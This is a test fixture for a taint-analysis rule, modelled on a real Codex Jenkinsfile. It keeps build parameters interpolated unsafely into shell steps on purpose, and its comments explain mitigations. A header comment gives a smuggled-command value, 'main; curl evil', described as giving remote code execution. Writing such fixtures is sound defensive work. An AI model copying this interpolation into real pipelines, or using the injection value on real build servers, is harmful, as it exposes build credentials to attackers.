// Real-world fixture — derived from:
//   roryeckel/codex-jenkinsfile — Jenkinsfile
//   https://github.com/roryeckel/codex-jenkinsfile
//
// Purpose: exercises TAINT-JK-001 — attacker-controlled params
// interpolated into a double-quoted Groovy ``sh "..."`` step.  The
// real Jenkinsfile accepts a ``GIT_BRANCH`` build parameter and
// interpolates it directly into git commands.  Anyone with Build
// permission can trigger the job with GIT_BRANCH=``main; curl evil``
// and get RCE under the build agent's credentials.
// Declarative pipeline. Every value under ``parameters`` is supplied at
// build-trigger time by whoever holds Build permission on the job, so
// all three strings are untrusted input from the pipeline's point of view.
pipeline {
    agent any
    parameters {
        string(name: 'GIT_BRANCH', defaultValue: 'main', description: 'Branch to work on')
        string(name: 'GIT_USER_NAME', defaultValue: 'Codex Bot', description: 'Commit author name')
        string(name: 'PROMPT', defaultValue: 'Improve code', description: 'Codex prompt')
    }
    stages {
        stage('Checkout') {
            steps {
                // Groovy expands ``${params.GIT_BRANCH}`` inside the double-quoted
                // string BEFORE the text reaches the ``sh`` step, so shell
                // metacharacters in the parameter become part of the command line.
                // Mitigation: keep the Groovy string single-quoted and let the
                // shell read the value from its environment, e.g.
                //   sh 'git fetch origin "$GIT_BRANCH"'
                // (build parameters are exposed to the step as environment
                // variables; an explicit ``environment {}`` / ``withEnv`` binding
                // makes the dependency visible).  Even then, a value beginning
                // with ``-`` is parsed by git as an option, so validate the
                // branch name first (``git check-ref-format --branch`` or an
                // allowlist) and/or pass ``--`` before positional arguments.
                sh "git fetch origin ${params.GIT_BRANCH}"                       // <- TAINT-JK-001
                sh "git checkout -f ${params.GIT_BRANCH}"                        // <- TAINT-JK-001
                sh "git reset --hard origin/${params.GIT_BRANCH}"                // <- TAINT-JK-001
            }
        }
        stage('Author') {
            steps {
                // The single quotes around the value are shell quoting, applied
                // AFTER Groovy has already pasted the raw parameter in; a ``'``
                // in GIT_USER_NAME closes that quote and the remainder runs as
                // shell.  ``|| true`` only hides git's exit status and is not a
                // mitigation.  Same fix as above: single-quoted Groovy string,
                // ``"$GIT_USER_NAME"`` expanded by the shell.
                sh "git config user.name '${params.GIT_USER_NAME}' || true"       // <- TAINT-JK-001
            }
        }
        stage('Commit') {
            steps {
                // Same pattern: PROMPT is interpolated by Groovy into a
                // shell-single-quoted ``-m`` argument, so a ``'`` in the prompt
                // breaks out.  Prefer ``sh 'git commit -m "$COMMIT_MSG"'`` with
                // the message built into an environment variable, or pass the
                // message via ``-F`` from a file written by ``writeFile``.
                sh "git commit -m 'Changes by Codex\\n\\nPrompt: ${params.PROMPT}'" // <- TAINT-JK-001
            }
        }
    }
}
